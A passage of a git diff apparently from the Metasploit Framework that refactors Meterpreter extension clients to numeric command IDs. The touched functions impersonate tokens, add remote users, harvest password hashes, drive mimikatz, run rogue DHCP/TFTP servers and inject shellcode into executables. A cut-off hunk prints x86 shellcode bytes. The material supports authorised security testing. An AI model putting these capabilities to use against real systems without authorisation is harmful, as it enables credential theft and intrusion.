+    packet_request = Packet.create_request(COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY)
+    packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_SIZE_IN, size)
+    packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_BLOB_IN, blob)
+
+    response = client.send_request(packet_request)
+    return nil unless response
+
+    {
+      success: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_STATUS),
+      blob: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_RETURNEDBLOB),
+      error: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_ERRORMESSAGE)
+    }
+  end
+
+  attr_accessor :client
+end
+
+end
+end
+end
+end
+end
 end
diff --git a/lib/rex/post/meterpreter/extensions/extapi/service/service.rb b/lib/rex/post/meterpreter/extensions/extapi/service/service.rb
index 0318c1aeacf55..5a4e0e1656645 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/service/service.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/service/service.rb
@@ -29,7 +29,7 @@ def initialize(client)
   # Enumerate all the services on the target.
   #
   def enumerate
-    request = Packet.create_request('extapi_service_enum')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_SERVICE_ENUM)
     response = client.send_request(request)
 
     services = []
@@ -51,7 +51,7 @@ def enumerate
   # Query some detailed parameters about a particular service.
   #
   def query(service_name)
-    request = Packet.create_request('extapi_service_query')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_SERVICE_QUERY)
     request.add_tlv(TLV_TYPE_EXT_SERVICE_ENUM_NAME, service_name)
 
     response = client.send_request(request)
@@ -91,7 +91,7 @@ def control(service_name, op)
       raise ArgumentError, "Invalid operation: #{op}"
     end
 
-    request = Packet.create_request('extapi_service_control')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_SERVICE_CONTROL)
     request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_NAME, service_name)
     request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_OP, op)
     client.send_request(request)
diff --git a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb
index 9f4c09c95a459..609fd8e49a329 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb
@@ -5,6 +5,27 @@ module Meterpreter
 module Extensions
 module Extapi
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_EXTAPI = 3000
+
+# Associated command ids
+COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY        = EXTENSION_ID_EXTAPI + 1
+COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA       = EXTENSION_ID_EXTAPI + 2
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP   = EXTENSION_ID_EXTAPI + 3
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE  = EXTENSION_ID_EXTAPI + 4
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE  = EXTENSION_ID_EXTAPI + 5
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME = EXTENSION_ID_EXTAPI + 6
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START  = EXTENSION_ID_EXTAPI + 7
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP   = EXTENSION_ID_EXTAPI + 8
+COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA       = EXTENSION_ID_EXTAPI + 9
+COMMAND_ID_EXTAPI_NTDS_PARSE               = EXTENSION_ID_EXTAPI + 10
+COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY       = EXTENSION_ID_EXTAPI + 11
+COMMAND_ID_EXTAPI_SERVICE_CONTROL          = EXTENSION_ID_EXTAPI + 12
+COMMAND_ID_EXTAPI_SERVICE_ENUM             = EXTENSION_ID_EXTAPI + 13
+COMMAND_ID_EXTAPI_SERVICE_QUERY            = EXTENSION_ID_EXTAPI + 14
+COMMAND_ID_EXTAPI_WINDOW_ENUM              = EXTENSION_ID_EXTAPI + 15
+COMMAND_ID_EXTAPI_WMI_QUERY                = EXTENSION_ID_EXTAPI + 16
+
 TLV_TYPE_EXTENSION_EXTAPI = 0
 
 TLV_TYPE_EXT_WINDOW_ENUM_GROUP              = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 1)
diff --git a/lib/rex/post/meterpreter/extensions/extapi/window/window.rb b/lib/rex/post/meterpreter/extensions/extapi/window/window.rb
index cf359d7d76d30..9210d32b53f6e 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/window/window.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/window/window.rb
@@ -1,60 +1,61 @@
 # -*- coding: binary -*-
 
 module Rex
-  module Post
-    module Meterpreter
-      module Extensions
-        module Extapi
-          module Window
-            ###
-            #
-            # This meterpreter extension contains extended API functions for
-            # querying and managing desktop windows.
-            #
-            ###
-            class Window
-
-              def initialize(client)
-                @client = client
-              end
-
-              # Enumerate all the windows on the target.
-              # If the specified parent window is nil, then all top-level windows
-              # are enumerated. Otherwise, all child windows of the specified
-              # parent window are enumerated.
-              def enumerate(include_unknown = false, parent_window = nil)
-                request = Packet.create_request('extapi_window_enum')
-
-                if include_unknown
-                  request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN, true)
-                end
-
-                if !parent_window.nil?
-                  request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE, parent_window)
-                end
-
-                response = client.send_request(request)
-
-                windows = []
-
-                response.each(TLV_TYPE_EXT_WINDOW_ENUM_GROUP) do |w|
-                  windows << {
-                    pid: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_PID),
-                    handle: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE),
-                    title: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_TITLE),
-                    class_name: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_CLASSNAME)
-                  }
-                end
-
-                windows.sort_by { |w| w[:pid] }
-              end
-
-              attr_accessor :client
-
-            end
-          end
-        end
-      end
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+module Window
+
+###
+#
+# This meterpreter extension contains extended API functions for
+# querying and managing desktop windows.
+#
+###
+class Window
+
+  def initialize(client)
+    @client = client
+  end
+
+  # Enumerate all the windows on the target.
+  # If the specified parent window is nil, then all top-level windows
+  # are enumerated. Otherwise, all child windows of the specified
+  # parent window are enumerated.
+  def enumerate(include_unknown = false, parent_window = nil)
+    request = Packet.create_request(COMMAND_ID_EXTAPI_WINDOW_ENUM)
+
+    if include_unknown
+      request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN, true)
+    end
+
+    if !parent_window.nil?
+      request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE, parent_window)
+    end
+
+    response = client.send_request(request)
+
+    windows = []
+
+    response.each(TLV_TYPE_EXT_WINDOW_ENUM_GROUP) do |w|
+      windows << {
+        pid: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_PID),
+        handle: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE),
+        title: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_TITLE),
+        class_name: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_CLASSNAME)
+      }
     end
+
+    windows.sort_by { |w| w[:pid] }
   end
+
+  attr_accessor :client
+
+end
+end
+end
+end
+end
+end
 end
diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb
index a69cfdfb077ca..c5de56d1c08e2 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb
@@ -29,7 +29,7 @@ def initialize(client)
   # @return [Hash] Array of field names with associated values.
   #
   def query(query, root = nil)
-    request = Packet.create_request('extapi_wmi_query')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_WMI_QUERY)
 
     request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.to_s.strip.empty?
     request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query)
diff --git a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
index 12d69376159b8..bfddad0c6af8b 100644
--- a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
+++ b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
@@ -17,6 +17,9 @@ module Incognito
 ###
 class Incognito < Extension
 
+  def self.extension_id
+    EXTENSION_ID_INCOGNITO
+  end
 
   def initialize(client)
     super(client, 'incognito')
@@ -30,21 +33,20 @@ def initialize(client)
       ])
   end
 
-
   def incognito_list_tokens(token_order)
-    request = Packet.create_request('incognito_list_tokens')
+    request = Packet.create_request(COMMAND_ID_INCOGNITO_LIST_TOKENS)
     request.add_tlv(TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER, token_order)
 
     response = client.send_request(request)
 
-    return {
+    {
       'delegation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION),
       'impersonation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)
     }
   end
 
   def incognito_impersonate_token(username)
-    request = Packet.create_request('incognito_impersonate_token')
+    request = Packet.create_request(COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN)
     request.add_tlv(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, username)
     response = client.send_request(request)
 
@@ -52,7 +54,7 @@ def incognito_impersonate_token(username)
   end
 
   def incognito_add_user(host, username, password)
-    request = Packet.create_request('incognito_add_user')
+    request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_USER)
     request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
     request.add_tlv(TLV_TYPE_INCOGNITO_PASSWORD, password)
     request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
@@ -62,7 +64,7 @@ def incognito_add_user(host, username, password)
   end
 
   def incognito_add_group_user(host, groupname, username)
-    request = Packet.create_request('incognito_add_group_user')
+    request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_GROUP_USER)
     request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
     request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
     request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
@@ -72,7 +74,7 @@ def incognito_add_group_user(host, groupname, username)
   end
 
   def incognito_add_localgroup_user(host, groupname, username)
-    request = Packet.create_request('incognito_add_localgroup_user')
+    request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER)
     request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
     request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
     request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
@@ -82,11 +84,11 @@ def incognito_add_localgroup_user(host, groupname, username)
   end
 
   def incognito_snarf_hashes(host)
-    request = Packet.create_request('incognito_snarf_hashes')
+    request = Packet.create_request(COMMAND_ID_INCOGNITO_SNARF_HASHES)
     request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
-    response = client.send_request(request)
+    client.send_request(request)
 
-    return true
+    true
   end
 
 end
diff --git a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
index 586e69171abe6..9dadb86ab2e77 100644
--- a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
@@ -5,6 +5,17 @@ module Meterpreter
 module Extensions
 module Incognito
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_INCOGNITO = 12000
+
+# Associated command ids
+COMMAND_ID_INCOGNITO_ADD_GROUP_USER      = EXTENSION_ID_INCOGNITO + 1
+COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER = EXTENSION_ID_INCOGNITO + 2
+COMMAND_ID_INCOGNITO_ADD_USER            = EXTENSION_ID_INCOGNITO + 3
+COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN   = EXTENSION_ID_INCOGNITO + 4
+COMMAND_ID_INCOGNITO_LIST_TOKENS         = EXTENSION_ID_INCOGNITO + 5
+COMMAND_ID_INCOGNITO_SNARF_HASHES        = EXTENSION_ID_INCOGNITO + 6
+
 TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION        	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
 TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION        	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
 TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER       	= TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 4)
diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
index 0836f1393b4e1..7c0d820df925c 100644
--- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
+++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
@@ -22,6 +22,10 @@ module Kiwi
 
 class Kiwi < Extension
 
+  def self.extension_id
+    EXTENSION_ID_KIWI
+  end
+
   #
   # Typical extension initialization routine.
   #
@@ -43,7 +47,7 @@ def initialize(client)
   end
 
   def exec_cmd(cmd)
-    request = Packet.create_request('kiwi_exec_cmd')
+    request = Packet.create_request(COMMAND_ID_KIWI_EXEC_CMD)
     request.add_tlv(TLV_TYPE_KIWI_CMD, cmd)
     response = client.send_request(request)
     output = response.get_tlv_value(TLV_TYPE_KIWI_CMD_RESULT)
diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb
index c57db2c4c53dd..7437679256de5 100644
--- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb
@@ -5,8 +5,14 @@ module Meterpreter
 module Extensions
 module Kiwi
 
-TLV_TYPE_KIWI_CMD                  = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 100)
-TLV_TYPE_KIWI_CMD_RESULT           = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 101)
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_KIWI = 8000
+
+# Associated command ids
+COMMAND_ID_KIWI_EXEC_CMD = EXTENSION_ID_KIWI + 1
+
+TLV_TYPE_KIWI_CMD        = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 100)
+TLV_TYPE_KIWI_CMD_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 101)
 
 end
 end
diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb b/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb
index 5c394717783b1..66e478b450fae 100644
--- a/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb
+++ b/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb
@@ -21,17 +21,17 @@ def initialize(client)
   end
 
   def start
-    client.send_request(Packet.create_request('lanattacks_start_dhcp'))
+    client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_START_DHCP))
     true
   end
 
   def reset
-    client.send_request(Packet.create_request('lanattacks_reset_dhcp'))
+    client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_RESET_DHCP))
     true
   end
 
   def set_option(name, value)
-    request = Packet.create_request('lanattacks_set_dhcp_option')
+    request = Packet.create_request(COMMAND_ID_LANATTACKS_SET_DHCP_OPTION)
     request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, name)
     request.add_tlv(TLV_TYPE_LANATTACKS_OPTION, value)
     client.send_request(request)
@@ -50,12 +50,12 @@ def load_options(datastore)
   end
 
   def stop
-    client.send_request(Packet.create_request('lanattacks_stop_dhcp'))
+    client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_STOP_DHCP))
     true
   end
 
   def log
-    response = client.send_request(Packet.create_request('lanattacks_dhcp_log'))
+    response = client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_DHCP_LOG))
     entries = []
     if( response.result == 0 )
       log = response.get_tlv_value( TLV_TYPE_LANATTACKS_RAW )
diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
index baa4817059f1a..af3aafe3b184a 100644
--- a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
+++ b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
@@ -17,6 +17,10 @@ module Lanattacks
 ###
 class Lanattacks < Extension
 
+  def self.extension_id
+    EXTENSION_ID_LANATTACKS
+  end
+
   #
   # Initializes an instance of the lanattacks extension.
   #
diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb b/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb
index 3d1c287e749e3..04c0128a7aeef 100644
--- a/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb
+++ b/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb
@@ -21,17 +21,17 @@ def initialize(client)
   end
 
   def start
-    client.send_request(Packet.create_request('lanattacks_start_tftp'))
+    client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_START_TFTP))
     true
   end
 
   def reset
-    client.send_request(Packet.create_request('lanattacks_reset_tftp'))
+    client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_RESET_TFTP))
     true
   end
 
   def add_file(filename, data)
-    request = Packet.create_request('lanattacks_add_tftp_file')
+    request = Packet.create_request(COMMAND_ID_LANATTACKS_ADD_TFTP_FILE)
     request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, filename)
     request.add_tlv(TLV_TYPE_LANATTACKS_RAW, data, false, true) #compress it
     client.send_request(request)
@@ -39,7 +39,7 @@ def add_file(filename, data)
   end
 
   def stop
-    client.send_request(Packet.create_request('lanattacks_stop_tftp'))
+    client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_STOP_TFTP))
     true
   end
 
diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
index 7a71196578244..d54b673872e5e 100644
--- a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
@@ -5,6 +5,20 @@ module Meterpreter
 module Extensions
 module Lanattacks
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_LANATTACKS = 15000
+
+# Associated command ids
+COMMAND_ID_LANATTACKS_ADD_TFTP_FILE   = EXTENSION_ID_LANATTACKS + 1
+COMMAND_ID_LANATTACKS_DHCP_LOG        = EXTENSION_ID_LANATTACKS + 2
+COMMAND_ID_LANATTACKS_RESET_DHCP      = EXTENSION_ID_LANATTACKS + 3
+COMMAND_ID_LANATTACKS_RESET_TFTP      = EXTENSION_ID_LANATTACKS + 4
+COMMAND_ID_LANATTACKS_SET_DHCP_OPTION = EXTENSION_ID_LANATTACKS + 5
+COMMAND_ID_LANATTACKS_START_DHCP      = EXTENSION_ID_LANATTACKS + 6
+COMMAND_ID_LANATTACKS_START_TFTP      = EXTENSION_ID_LANATTACKS + 7
+COMMAND_ID_LANATTACKS_STOP_DHCP       = EXTENSION_ID_LANATTACKS + 8
+COMMAND_ID_LANATTACKS_STOP_TFTP       = EXTENSION_ID_LANATTACKS + 9
+
 TLV_TYPE_LANATTACKS_OPTION      = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 1)
 TLV_TYPE_LANATTACKS_OPTION_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
 TLV_TYPE_LANATTACKS_UINT        = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 3)
diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb b/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb
index 098e69494f10a..9952f2321a03f 100644
--- a/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb
+++ b/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb
@@ -21,6 +21,10 @@ module Mimikatz
 
 class Mimikatz < Extension
 
+  def self.extension_id
+    EXTENSION_ID_MIMIKATZ
+  end
+
   def initialize(client)
     super(client, 'mimikatz')
 
@@ -34,7 +38,7 @@ def initialize(client)
   end
 
   def send_custom_command_raw(function, args=[])
-    request = Packet.create_request('mimikatz_custom_command')
+    request = Packet.create_request(COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND)
     request.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function)
     args.each do |a|
       request.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, a)
diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb b/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb
index c260720b4a5f3..fb75fa41e7299 100644
--- a/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb
@@ -5,6 +5,12 @@ module Meterpreter
 module Extensions
 module Mimikatz
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_MIMIKATZ = 17000
+
+# Associated command ids
+COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND = EXTENSION_ID_MIMIKATZ + 1
+
 TLV_TYPE_MIMIKATZ_RESULT	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1)
 TLV_TYPE_MIMIKATZ_FUNCTION	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
 TLV_TYPE_MIMIKATZ_ARGUMENT	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
index ac0c0452952df..8f4abdc2d5a34 100644
--- a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
+++ b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
@@ -13,6 +13,10 @@ module NetworkPug
 
 class NetworkPug < Extension
 
+  def self.extension_id
+    EXTENSION_ID_NETWORKPUG
+  end
+
   def initialize(client)
     super(client, 'networkpug')
 
@@ -26,7 +30,7 @@ def initialize(client)
   end
 
   def networkpug_start(interface, filter)
-    request = Packet.create_request('networkpug_start')
+    request = Packet.create_request(COMMAND_ID_NETWORKPUG_START)
     request.add_tlv(TLV_TYPE_NETWORKPUG_INTERFACE, interface)
     request.add_tlv(TLV_TYPE_NETWORKPUG_FILTER, filter) if(filter and filter != "")
     response = client.send_request(request)
@@ -38,7 +42,7 @@ def networkpug_start(interface, filter)
       channel = Rex::Post::Meterpreter::Channels::Pools::StreamPool.new(
         client,
         channel_id,
-        "networkpug_interface",
+        'networkpug_interface',
         CHANNEL_FLAG_SYNCHRONOUS,
         response
       )
@@ -48,9 +52,9 @@ def networkpug_start(interface, filter)
   end
 
   def networkpug_stop(interface)
-    request = Packet.create_request('networkpug_stop')
+    request = Packet.create_request(COMMAND_ID_NETWORKPUG_STOP)
     request.add_tlv(TLV_TYPE_NETWORKPUG_INTERFACE, interface)
-    response = client.send_request(request)
+    client.send_request(request)
   end
 
 end
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
index 54e5941ab8ab9..22f6b0a9b0e5d 100644
--- a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
@@ -5,6 +5,13 @@ module Meterpreter
 module Extensions
 module NetworkPug
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_NETWORKPUG = 6000
+
+# Associated command ids
+COMMAND_ID_NETWORKPUG_START = EXTENSION_ID_NETWORKPUG + 1
+COMMAND_ID_NETWORKPUG_STOP  = EXTENSION_ID_NETWORKPUG + 2
+
 TLV_TYPE_EXTENSION_NETWORKPUG	= 0
 TLV_TYPE_NETWORKPUG_INTERFACE	= TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 1)
 TLV_TYPE_NETWORKPUG_FILTER	= TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 2)
diff --git a/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb b/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb
index 28e608906ce74..52b5a91878071 100644
--- a/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb
+++ b/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb
@@ -2,246 +2,251 @@
 require 'rex/post/meterpreter/extensions/peinjector/tlv'
 
 module Rex
-  module Post
-    module Meterpreter
-      module Extensions
-        module Peinjector
-          ###
-          #
-          # This meterpreter extensions allow to inject a given shellcode into an executable file.
-          #
-          ###
-          class Peinjector < Extension
-            def initialize(client)
-              super(client, 'peinjector')
-
-              client.register_extension_aliases(
-                [
-                  {
-                    'name' => 'peinjector',
-                    'ext'  => self
-                  }
-                ])
-            end
-
-            def inject_shellcode(opts = {})
-              return nil unless opts[:shellcode]
-
-              request = Packet.create_request('peinjector_inject_shellcode')
-              request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE, opts[:shellcode])
-              request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE, opts[:size])
-              request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64, opts[:isx64])
-              request.add_tlv(TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE, opts[:targetpe])
-
-              response = client.send_request(request)
-
-              error_msg = response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
-              raise error_msg if error_msg
-              return response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
-            end
-
-            def add_thread_x86(payload)
-              stackpreserve = "\x90\x90\x60\x9c"	# AUTOMATED ASM: x86 = ['nop', 'nop', 'pushad', 'pushfd']
-              shellcode = "\xE8\xB7\xFF\xFF\xFF"	# AUTOMATED ASM: x86 = ['call 0xffffffbc']
-              shellcode += payload
-
-              thread = "\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B" +	# AUTOMATED ASM: x86 = ['cld', 'nop', 'call 0xc8', 'pushad', 'mov ebp, esp', 'xor edx, edx', 'nop', 'invalid']
-                  "\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02" +	# AUTOMATED ASM: x86 = ['push edx', 'xor [ebx+0x528b0c52], cl', 'adc al, 0xeb', 'invalid']
-                  "\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61" +	# AUTOMATED ASM: x86 = ['inc ecx', 'adc [ebx-0x48f0d78e], cl', 'dec edx', 'xor edi, edi', 'xor eax, eax', 'lodsb', 'cmp al, 0x61']
-                  "\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B" +	# AUTOMATED ASM: x86 = ['jl 0x4', 'sub al, 0x20', 'ror edi, 0xd', 'add edi, eax', 'dec ecx', 'jnz 0xfffffffb', 'push edx', 'nop', 'push edi', 'invalid']
-                  "\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48" +	# AUTOMATED ASM: x86 = ['push edx', 'adc [eax+0x13c428b], dl', 'rcl byte [eax-0x1487bf75], 1', 'pop es', 'invalid']
-                  "\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0" +	# AUTOMATED ASM: x86 = ['inc edx', 'add al, 0x85', 'jl 0x3f', 'test eax, eax', 'jz 0x75', 'nop', 'add eax, edx']
-                  "\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B" +	# AUTOMATED ASM: x86 = ['push eax', 'nop', 'mov ecx, [eax+0x18]', 'mov ebx, [eax+0x20]', 'add ebx, edx', 'jecxz 0x64', 'dec ecx', 'mov esi, [ebx+ecx*4]']
-                  "\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF" +	# AUTOMATED ASM: x86 = ['add esi, edx', 'xor edi, edi', 'nop', 'xor eax, eax', 'jmp 0xd', 'jmp far dword [ecx-0x2b]', 'invalid']
-                  "\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D" +	# AUTOMATED ASM: x86 = ['or eax, 0xe038c701', 'jmp 0xc', 'jg 0x24', 'shr bl, cl', 'retf 0xe675', 'invalid']
-                  "\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B" +	# AUTOMATED ASM: x86 = ['clc', 'cmp edi, [ebp+0x24]', 'jnz 0xffffffda', 'pop eax', 'nop', 'mov ebx, [eax+0x24]', 'add ebx, edx', 'nop', 'invalid']
